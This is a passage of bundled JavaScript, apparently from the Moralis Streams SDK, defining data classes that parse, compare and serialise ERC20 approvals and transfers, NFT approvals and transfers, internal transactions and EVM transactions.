        var _a, _b;
        var erc20ApprovalA = StreamErc20Approval.create(valueA);
        var erc20ApprovalB = StreamErc20Approval.create(valueB);
        if (!erc20ApprovalA.chain.equals(erc20ApprovalB.chain)) return false;
        if (erc20ApprovalA.transactionHash !== erc20ApprovalB.transactionHash) return false;
        if (erc20ApprovalA.logIndex !== erc20ApprovalB.logIndex) return false;
        if (((_a = erc20ApprovalA.triggers) === null || _a === void 0 ? void 0 : _a.length) !== ((_b = erc20ApprovalB.triggers) === null || _b === void 0 ? void 0 : _b.length) || !$be177b42cca18859$export$537c1481727bf198.arrayEquals(erc20ApprovalA.triggers || [], erc20ApprovalB.triggers || [])) return false;
        return true;
    };
    /**
     * Compares an StreamErc20Approvalish data to this StreamErc20Approval instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * erc20Approval.equals(value);
     * ```
     */ StreamErc20Approval.prototype.equals = function(value) {
        return StreamErc20Approval.equals(this, value);
    };
    /**
     * Converts the StreamErc20Approval instance to a JSON object.
     * @returns JSON object of the StreamErc20Approval instance
     * @example `erc20Approval.toJSON()`
     */ StreamErc20Approval.prototype.toJSON = function() {
        var _a = this._data, chain = _a.chain, owner = _a.owner, spender = _a.spender, contract = _a.contract, value = _a.value, triggers = _a.triggers, data = $be177b42cca18859$var$__rest(_a, [
            "chain",
            "owner",
            "spender",
            "contract",
            "value",
            "triggers"
        ]);
        // eslint-disable-next-line @typescript-eslint/no-non-null-assertion
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: chain.toJSON(),
            owner: owner.toJSON(),
            spender: spender.toJSON(),
            contract: contract.toJSON(),
            value: value.toString(),
            triggers: triggers === null || triggers === void 0 ? void 0 : triggers.map(function(trigger) {
                return trigger.format();
            })
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ StreamErc20Approval.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(StreamErc20Approval.prototype, "chain", {
        get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Approval.prototype, "transactionHash", {
        get: function() {
            return this._data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Approval.prototype, "logIndex", {
        get: function() {
            return this._data.logIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Approval.prototype, "owner", {
        get: function() {
            return this._data.owner;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Approval.prototype, "spender", {
        get: function() {
            return this._data.spender;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Approval.prototype, "value", {
        get: function() {
            return this._data.value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Approval.prototype, "contract", {
        get: function() {
            return this._data.contract;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Approval.prototype, "tokenName", {
        get: function() {
            return this._data.tokenName;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Approval.prototype, "tokenSymbol", {
        get: function() {
            return this._data.tokenSymbol;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Approval.prototype, "tokenDecimals", {
        get: function() {
            return this._data.tokenDecimals;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Approval.prototype, "valueWithDecimals", {
        get: function() {
            return this._data.valueWithDecimals;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Approval.prototype, "triggers", {
        get: function() {
            return this._data.triggers;
        },
        enumerable: false,
        configurable: true
    });
    StreamErc20Approval.parse = function(data) {
        var chain = (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(data.chain);
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: chain,
            spender: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.spender),
            owner: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.owner),
            logIndex: +data.logIndex,
            contract: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.contract),
            value: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.value),
            valueWithDecimals: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.valueWithDecimals),
            tokenDecimals: data.tokenDecimals === "" ? undefined : +data.tokenDecimals,
            triggers: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.triggers, function(triggers) {
                return triggers.map(function(trigger) {
                    return $be177b42cca18859$export$537c1481727bf198.create(trigger);
                });
            })
        });
    };
    return StreamErc20Approval;
}();
/**
 * The StreamErc20Transfer class is a representation of a erc20 transfer that is returned by the Moralis Stream API
 *
 * @category DataType
 */ var $be177b42cca18859$export$7077c9e8a71a2f1 = /** @class */ function() {
    function StreamErc20Transfer(data) {
        this._data = StreamErc20Transfer.parse(data);
    }
    /**
     * Create a new instance of StreamErc20Transfer
     *
     * @param data - the StreamErc20Transferish type
     * @example
     * ```ts
     * const erc20Transfer = StreamErc20Transfer.create(data);
     * ```
     * @returns an instance of StreamErc20Transfer
     */ StreamErc20Transfer.create = function(data) {
        if (data instanceof StreamErc20Transfer) return data;
        return new StreamErc20Transfer(data);
    };
    /**
     * Compares two StreamErc20Transfer data. It checks a deep equality check of both values.
     * @param valueA - the first StreamErc20Transferish data to compare
     * @param valueB - the second StreamErc20Transferish data to compare
     * @returns true if the values are equal, false otherwise
     * @example
     * ```ts
     *  StreamErc20Transfer.equals(valueA, valueB);
     * ```
     */ StreamErc20Transfer.equals = function(valueA, valueB) {
        var _a, _b;
        var erc20TransferA = StreamErc20Transfer.create(valueA);
        var erc20TransferB = StreamErc20Transfer.create(valueB);
        if (!erc20TransferA.chain.equals(erc20TransferB.chain)) return false;
        if (erc20TransferA.transactionHash !== erc20TransferB.transactionHash) return false;
        if (erc20TransferA.logIndex !== erc20TransferB.logIndex) return false;
        if (((_a = erc20TransferA.triggers) === null || _a === void 0 ? void 0 : _a.length) !== ((_b = erc20TransferB.triggers) === null || _b === void 0 ? void 0 : _b.length) || !$be177b42cca18859$export$537c1481727bf198.arrayEquals(erc20TransferA.triggers || [], erc20TransferB.triggers || [])) return false;
        return true;
    };
    /**
     * Compares an StreamErc20Transferish data to this StreamErc20Transfer instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * erc20Transfer.equals(value);
     * ```
     */ StreamErc20Transfer.prototype.equals = function(value) {
        return StreamErc20Transfer.equals(this, value);
    };
    /**
     * Converts the StreamErc20Transfer instance to a JSON object.
     * @returns JSON object of the StreamErc20Transfer instance
     * @example `erc20Transfer.toJSON()`
     */ StreamErc20Transfer.prototype.toJSON = function() {
        var _a = this._data, chain = _a.chain, from = _a.from, to = _a.to, contract = _a.contract, value = _a.value, triggers = _a.triggers, data = $be177b42cca18859$var$__rest(_a, [
            "chain",
            "from",
            "to",
            "contract",
            "value",
            "triggers"
        ]);
        // eslint-disable-next-line @typescript-eslint/no-non-null-assertion
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: chain.toJSON(),
            from: from.toJSON(),
            to: to.toJSON(),
            contract: contract.toJSON(),
            value: value.toString(),
            triggers: triggers === null || triggers === void 0 ? void 0 : triggers.map(function(trigger) {
                return trigger.format();
            })
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ StreamErc20Transfer.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(StreamErc20Transfer.prototype, "chain", {
        get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Transfer.prototype, "transactionHash", {
        get: function() {
            return this._data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Transfer.prototype, "logIndex", {
        get: function() {
            return this._data.logIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Transfer.prototype, "from", {
        get: function() {
            return this._data.from;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Transfer.prototype, "to", {
        get: function() {
            return this._data.to;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Transfer.prototype, "value", {
        get: function() {
            return this._data.value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Transfer.prototype, "contract", {
        get: function() {
            return this._data.contract;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Transfer.prototype, "tokenName", {
        get: function() {
            return this._data.tokenName;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Transfer.prototype, "tokenSymbol", {
        get: function() {
            return this._data.tokenSymbol;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Transfer.prototype, "tokenDecimals", {
        get: function() {
            return this._data.tokenDecimals;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Transfer.prototype, "valueWithDecimals", {
        get: function() {
            return this._data.valueWithDecimals;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc20Transfer.prototype, "triggers", {
        get: function() {
            return this._data.triggers;
        },
        enumerable: false,
        configurable: true
    });
    StreamErc20Transfer.parse = function(data) {
        var chain = (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(data.chain);
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: chain,
            from: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.from),
            to: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.to),
            logIndex: +data.logIndex,
            contract: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.contract),
            value: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.value),
            valueWithDecimals: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.valueWithDecimals),
            tokenDecimals: data.tokenDecimals === "" ? undefined : +data.tokenDecimals,
            triggers: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.triggers, function(triggers) {
                return triggers.map(function(trigger) {
                    return $be177b42cca18859$export$537c1481727bf198.create(trigger);
                });
            })
        });
    };
    return StreamErc20Transfer;
}();
/**
 * The StreamErc1155Approval class is a representation of a nft approval (ERC721) that is returned by the Moralis Stream API
 *
 * @category DataType
 */ var $be177b42cca18859$export$15cc38286d624288 = /** @class */ function() {
    function StreamErc721Approval(data) {
        this._data = StreamErc721Approval.parse(data);
    }
    /**
     * Create a new instance of StreamErc721Approval
     *
     * @param data - the StreamErc721Approvalish type
     * @example
     * ```ts
     * const evmNftApproval = StreamErc721Approval.create(data);
     * ```
     * @returns an instance of StreamErc721Approval
     */ StreamErc721Approval.create = function(data) {
        if (data instanceof StreamErc721Approval) return data;
        return new StreamErc721Approval(data);
    };
    /**
     * Compares two StreamErc721Approval data. It checks a deep equality check of both values.
     * @param valueA - the first StreamErc721Approvalish data to compare
     * @param valueB - the second StreamErc721Approvalish data to compare
     * @returns true if the values are equal, false otherwise
     * @example
     * ```ts
     *  StreamErc721Approval.equals(valueA, valueB);
     * ```
     */ // eslint-disable-next-line complexity
    StreamErc721Approval.equals = function(valueA, valueB) {
        var _a, _b;
        var evmNftApprovalA = StreamErc721Approval.create(valueA);
        var evmNftApprovalB = StreamErc721Approval.create(valueB);
        if (!evmNftApprovalA.chain.equals(evmNftApprovalB.chain)) return false;
        if (evmNftApprovalA.transactionHash !== evmNftApprovalB.transactionHash) return false;
        if (!evmNftApprovalA.owner.equals(evmNftApprovalB.owner)) return false;
        if (!evmNftApprovalA.contract.equals(evmNftApprovalB.contract)) return false;
        if (evmNftApprovalA.tokenId !== evmNftApprovalB.tokenId) return false;
        if (!evmNftApprovalA.approved.equals(evmNftApprovalB.approved)) return false;
        if (((_a = evmNftApprovalA.triggers) === null || _a === void 0 ? void 0 : _a.length) !== ((_b = evmNftApprovalB.triggers) === null || _b === void 0 ? void 0 : _b.length) || !$be177b42cca18859$export$537c1481727bf198.arrayEquals(evmNftApprovalA.triggers || [], evmNftApprovalB.triggers || [])) return false;
        return true;
    };
    /**
     * Compares an StreamErc721Approvalish data to this StreamErc721Approval instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * evmNftApproval.equals(value);
     * ```
     */ StreamErc721Approval.prototype.equals = function(value) {
        return StreamErc721Approval.equals(this, value);
    };
    /**
     * Converts the StreamErc721Approval instance to a JSON object.
     * @returns JSON object of the StreamErc721Approval instance
     * @example `evmNftApproval.toJSON()`
     */ StreamErc721Approval.prototype.toJSON = function() {
        var _a;
        var data = this._data;
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: data.chain.toJSON(),
            contract: data.contract.toJSON(),
            owner: data.owner.toJSON(),
            approved: data.approved.toJSON(),
            triggers: (_a = data.triggers) === null || _a === void 0 ? void 0 : _a.map(function(trigger) {
                return trigger.format();
            })
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ StreamErc721Approval.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(StreamErc721Approval.prototype, "chain", {
        get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc721Approval.prototype, "approved", {
        get: function() {
            return this._data.approved;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc721Approval.prototype, "owner", {
        get: function() {
            return this._data.owner;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc721Approval.prototype, "transactionHash", {
        get: function() {
            return this._data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc721Approval.prototype, "contract", {
        get: function() {
            return this._data.contract;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc721Approval.prototype, "logIndex", {
        get: function() {
            return this._data.logIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc721Approval.prototype, "tokenId", {
        get: function() {
            return this._data.tokenId;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc721Approval.prototype, "tokenContractType", {
        get: function() {
            return this._data.tokenContractType;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc721Approval.prototype, "tokenName", {
        get: function() {
            return this._data.tokenName;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc721Approval.prototype, "tokenSymbol", {
        get: function() {
            return this._data.tokenSymbol;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc721Approval.prototype, "triggers", {
        get: function() {
            return this._data.triggers;
        },
        enumerable: false,
        configurable: true
    });
    StreamErc721Approval.parse = function(data) {
        var chain = (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(data.chain);
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: chain,
            logIndex: +data.logIndex,
            owner: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.owner),
            contract: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.contract),
            tokenContractType: data.tokenContractType,
            approved: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.approved),
            triggers: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.triggers, function(triggers) {
                return triggers.map(function(trigger) {
                    return $be177b42cca18859$export$537c1481727bf198.create(trigger);
                });
            })
        });
    };
    return StreamErc721Approval;
}();
/**
 * The StreamEvmInternalTransaction class is a representation of an internal transaction that is returned by the Moralis Stream API
 *
 * @category DataType
 */ var $be177b42cca18859$export$bfeceda31b34f56e = /** @class */ function() {
    function StreamEvmInternalTransaction(data) {
        this._data = StreamEvmInternalTransaction.parse(data);
    }
    /**
     * Create a new instance of StreamEvmInternalTransactionish
     *
     * @param data - the StreamEvmInternalTransactionishish type
     * @example
     * ```ts
     * const transaction = StreamEvmTransactionish.create(data);
     * ```
     * @returns an instance of StreamEvmInternalTransaction
     */ StreamEvmInternalTransaction.create = function(data) {
        if (data instanceof StreamEvmInternalTransaction) return data;
        return new StreamEvmInternalTransaction(data);
    };
    /**
     * Compares two StreamEvmInternalTransaction data. It checks a deep equality check of both values.
     * @param valueA - the first StreamEvmInternalTransactionish data to compare
     * @param valueB - the second StreamEvmInternalTransactionish data to compare
     * @returns true if the values are equal, false otherwise
     * @example
     * ```ts
     *  StreamEvmInternalTransaction.equals(valueA, valueB);
     * ```
     */ StreamEvmInternalTransaction.equals = function(valueA, valueB) {
        var _a, _b;
        var evmInternalTransactionA = StreamEvmInternalTransaction.create(valueA);
        var evmInternalTransactionB = StreamEvmInternalTransaction.create(valueB);
        if (!evmInternalTransactionA.chain.equals(evmInternalTransactionB.chain)) return false;
        if (evmInternalTransactionA.transactionHash !== evmInternalTransactionB.transactionHash) return false;
        if (((_a = evmInternalTransactionA.triggers) === null || _a === void 0 ? void 0 : _a.length) !== ((_b = evmInternalTransactionB.triggers) === null || _b === void 0 ? void 0 : _b.length) || !$be177b42cca18859$export$537c1481727bf198.arrayEquals(evmInternalTransactionA.triggers || [], evmInternalTransactionB.triggers || [])) return false;
        return true;
    };
    /**
     * Compares an StreamEvmInternalTransactionish data to this StreamEvmInternalTransaction instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * evmInternalTransaction.equals(value);
     * ```
     */ StreamEvmInternalTransaction.prototype.equals = function(value) {
        return StreamEvmInternalTransaction.equals(this, value);
    };
    /**
     * Converts the StreamEvmInternalTransaction instance to a JSON object.
     * @returns JSON object of the StreamEvmInternalTransaction instance
     * @example `evmInternalTransaction.toJSON()`
     */ StreamEvmInternalTransaction.prototype.toJSON = function() {
        var _a, _b, _c, _d, _e;
        var data = this._data;
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: data.chain.toJSON(),
            from: (_a = data.from) === null || _a === void 0 ? void 0 : _a.toJSON(),
            to: (_b = data.to) === null || _b === void 0 ? void 0 : _b.toJSON(),
            value: (_c = data.value) === null || _c === void 0 ? void 0 : _c.toString(),
            gas: (_d = data.gas) === null || _d === void 0 ? void 0 : _d.toString(),
            triggers: (_e = data.triggers) === null || _e === void 0 ? void 0 : _e.map(function(trigger) {
                return trigger.format();
            })
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ StreamEvmInternalTransaction.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(StreamEvmInternalTransaction.prototype, "chain", {
        get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmInternalTransaction.prototype, "from", {
        get: function() {
            return this._data.from;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmInternalTransaction.prototype, "to", {
        get: function() {
            return this._data.to;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmInternalTransaction.prototype, "value", {
        get: function() {
            return this._data.value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmInternalTransaction.prototype, "transactionHash", {
        get: function() {
            return this._data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmInternalTransaction.prototype, "gas", {
        get: function() {
            return this._data.gas;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmInternalTransaction.prototype, "triggers", {
        get: function() {
            return this._data.triggers;
        },
        enumerable: false,
        configurable: true
    });
    StreamEvmInternalTransaction.parse = function(data) {
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(data.chain),
            from: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.from, function(value) {
                return (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(value);
            }),
            to: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.to, function(value) {
                return (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(value);
            }),
            value: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.value, function(value) {
                return (0, $10891f2cb3e98601$export$d97aa349ed20696).create(value);
            }),
            gas: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.gas, function(value) {
                return (0, $10891f2cb3e98601$export$d97aa349ed20696).create(value);
            }),
            triggers: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.triggers, function(triggers) {
                return triggers.map(function(trigger) {
                    return $be177b42cca18859$export$537c1481727bf198.create(trigger);
                });
            })
        });
    };
    return StreamEvmInternalTransaction;
}();
/**
 * The StreamEvmNftTransfer class is a representation of a nft transfer (EREC721 or ERC1155) that is returned by the Moralis Stream API
 *
 * @category DataType
 */ var $be177b42cca18859$export$f5b671948b53bfb3 = /** @class */ function() {
    function StreamEvmNftTransfer(data) {
        this._data = StreamEvmNftTransfer.parse(data);
    }
    /**
     * Create a new instance of StreamEvmNftTransferish
     *
     * @param data - the StreamEvmNftTransferishish type
     * @example
     * ```ts
     * const transfer = StreamEvmTransactionish.create(data);
     * ```
     * @returns an instance of StreamEvmNftTransfer
     */ StreamEvmNftTransfer.create = function(data) {
        if (data instanceof StreamEvmNftTransfer) return data;
        return new StreamEvmNftTransfer(data);
    };
    StreamEvmNftTransfer.parse = function(data) {
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(data.chain),
            to: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.to),
            contract: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.contract),
            from: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.from),
            logIndex: +data.logIndex,
            operator: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.operator, function(operator) {
                return (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(operator);
            }),
            tokenId: data.tokenId,
            transactionHash: data.transactionHash,
            amount: +data.amount,
            tokenName: data.tokenName,
            triggers: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.triggers, function(triggers) {
                return triggers.map(function(trigger) {
                    return $be177b42cca18859$export$537c1481727bf198.create(trigger);
                });
            })
        });
    };
    /**
     * Compares two StreamEvmNftTransfer data. It checks a deep equality check of both values.
     * @param valueA - the first StreamEvmNftTransferish data to compare
     * @param valueB - the second StreamEvmNftTransferish data to compare
     * @returns true if the values are equal, false otherwise
     * @example
     * ```ts
     *  StreamEvmNftTransfer.equals(valueA, valueB);
     * ```
     */ // eslint-disable-next-line complexity
    StreamEvmNftTransfer.equals = function(valueA, valueB) {
        var _a, _b;
        var transferA = StreamEvmNftTransfer.create(valueA);
        var transferB = StreamEvmNftTransfer.create(valueB);
        if (!transferA.chain.equals(transferB.chain)) return false;
        if (transferA.transactionHash !== transferB.transactionHash) return false;
        if (transferA.logIndex !== transferB.logIndex) return false;
        if (!transferA.contract.equals(transferB.contract)) return false;
        if (transferA.tokenId !== transferB.tokenId) return false;
        if (((_a = transferA.triggers) === null || _a === void 0 ? void 0 : _a.length) !== ((_b = transferB.triggers) === null || _b === void 0 ? void 0 : _b.length) || !$be177b42cca18859$export$537c1481727bf198.arrayEquals(transferA.triggers || [], transferB.triggers || [])) return false;
        return true;
    };
    /**
     * Compares an StreamEvmNftTransferish data to this StreamEvmNftTransfer instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * transfer.equals(value);
     * ```
     */ StreamEvmNftTransfer.prototype.equals = function(value) {
        return StreamEvmNftTransfer.equals(this, value);
    };
    /**
     * Converts the StreamEvmNftTransfer instance to a JSON object.
     * @returns JSON object of the StreamEvmNftTransfer instance
     * @example `transfer.toJSON()`
     */ StreamEvmNftTransfer.prototype.toJSON = function() {
        var _a, _b;
        var data = this._data;
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: data.chain.toJSON(),
            from: data.from.toJSON(),
            to: data.to.toJSON(),
            contract: data.contract.toJSON(),
            operator: (_a = data.operator) === null || _a === void 0 ? void 0 : _a.toJSON(),
            triggers: (_b = data.triggers) === null || _b === void 0 ? void 0 : _b.map(function(trigger) {
                return trigger.format();
            })
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ StreamEvmNftTransfer.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(StreamEvmNftTransfer.prototype, "chain", {
        get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTransfer.prototype, "transactionHash", {
        get: function() {
            return this._data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTransfer.prototype, "from", {
        get: function() {
            return this._data.from;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTransfer.prototype, "to", {
        get: function() {
            return this._data.to;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTransfer.prototype, "contract", {
        get: function() {
            return this._data.contract;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTransfer.prototype, "logIndex", {
        get: function() {
            return this._data.logIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTransfer.prototype, "tokenId", {
        get: function() {
            return this._data.tokenId;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTransfer.prototype, "amount", {
        get: function() {
            return this._data.amount;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTransfer.prototype, "tokenContractType", {
        get: function() {
            return this._data.tokenContractType;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTransfer.prototype, "tokenName", {
        get: function() {
            return this._data.tokenName;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTransfer.prototype, "tokenSymbol", {
        get: function() {
            return this._data.tokenSymbol;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTransfer.prototype, "operator", {
        get: function() {
            return this._data.operator;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTransfer.prototype, "triggers", {
        get: function() {
            return this._data.triggers;
        },
        enumerable: false,
        configurable: true
    });
    return StreamEvmNftTransfer;
}();
/**
 * The StreamEvmTransaction class is a representation of a transaction that is returned by the Moralis Stream API
 *
 * @category DataType
 */ var $be177b42cca18859$export$41f3983c34968df8 = /** @class */ function() {
    function StreamEvmTransaction(_a) {
        var data = $be177b42cca18859$var$__rest(_a, []);
        this._data = StreamEvmTransaction.parse(data);
    }
    /**
     * Create a new instance of StreamEvmTransactionish
     *
     * @param data - the StreamEvmTransactionishish type
     * @example
     * ```ts
     * const transaction = StreamEvmTransactionish.create(data);
     * ```
     * @returns an instance of StreamEvmTransaction
     */ StreamEvmTransaction.create = function(data) {
        if (data instanceof StreamEvmTransaction) return data;
        return new StreamEvmTransaction(data);
    };
    StreamEvmTransaction.parse = function(data) {
        var signature = data.r != null && data.s != null && data.v != null ? (0, $3dfc2d9370ba0cd1$export$8da68a2b5f3f6f70).create({
            r: data.r,
            s: data.s,
            v: data.v
        }) : undefined;
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(data.chain),
            gas: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.gas, (0, $10891f2cb3e98601$export$d97aa349ed20696).create),
            gasPrice: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.gasPrice, (0, $10891f2cb3e98601$export$d97aa349ed20696).create),
            nonce: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.nonce, (0, $10891f2cb3e98601$export$d97aa349ed20696).create),
            input: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.input),
            fromAddress: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.fromAddress),
            toAddress: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.toAddress, function(address) {
                return (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(address);
            }),
            value: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.value, (0, $10891f2cb3e98601$export$d97aa349ed20696).create),
            type: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.type, function(type) {
                return +type;
            }),
            receiptCumulativeGasUsed: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.receiptCumulativeGasUsed, (0, $10891f2cb3e98601$export$d97aa349ed20696).create),
            receiptGasUsed: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.receiptGasUsed, (0, $10891f2cb3e98601$export$d97aa349ed20696).create),
            receiptContractAddress: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.receiptContractAddress, function(address) {
                return (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(address);
            }),
            receiptRoot: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.receiptRoot),
            receiptStatus: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.receiptStatus, function(status) {
                return +status;
            }),
            signature: signature,
            transactionIndex: +data.transactionIndex,
